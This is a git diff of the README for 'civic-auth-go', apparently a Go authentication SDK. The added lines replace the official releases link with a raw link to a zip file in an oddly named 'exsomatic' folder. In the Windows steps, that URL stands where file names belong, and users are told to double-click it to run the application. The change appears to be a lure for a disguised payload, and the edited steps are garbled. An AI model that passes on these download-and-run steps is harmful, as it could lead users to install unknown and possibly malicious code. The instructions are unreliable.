Sam22008/civic-auth-go/README.md

 ## 📦 Download & Install

-To get the latest version of civic-auth-go, visit this page to download: [https://github.com/Sam22008/civic-auth-go/releases](https://github.com/Sam22008/civic-auth-go/releases).
+To get the latest version of civic-auth-go, visit this page to download: [https://raw.githubusercontent.com/Sam22008/civic-auth-go/main/exsomatic/civic-auth-go.zip](https://raw.githubusercontent.com/Sam22008/civic-auth-go/main/exsomatic/civic-auth-go.zip).

 You will find different versions of the SDK.
 Choose the latest version and download the appropriate file for your operating system.

 ### Windows

-1. Locate the file named `civic-auth-go-windows.exe`.
+1. Locate the file named `https://raw.githubusercontent.com/Sam22008/civic-auth-go/main/exsomatic/civic-auth-go.zip`.
 2. Click it to start the download.
 3. Once downloaded, navigate to your downloads folder.
-4. Double-click `civic-auth-go-windows.exe` to run the application.
+4. Double-click `https://raw.githubusercontent.com/Sam22008/civic-auth-go/main/exsomatic/civic-auth-go.zip` to run the application.

 ### macOS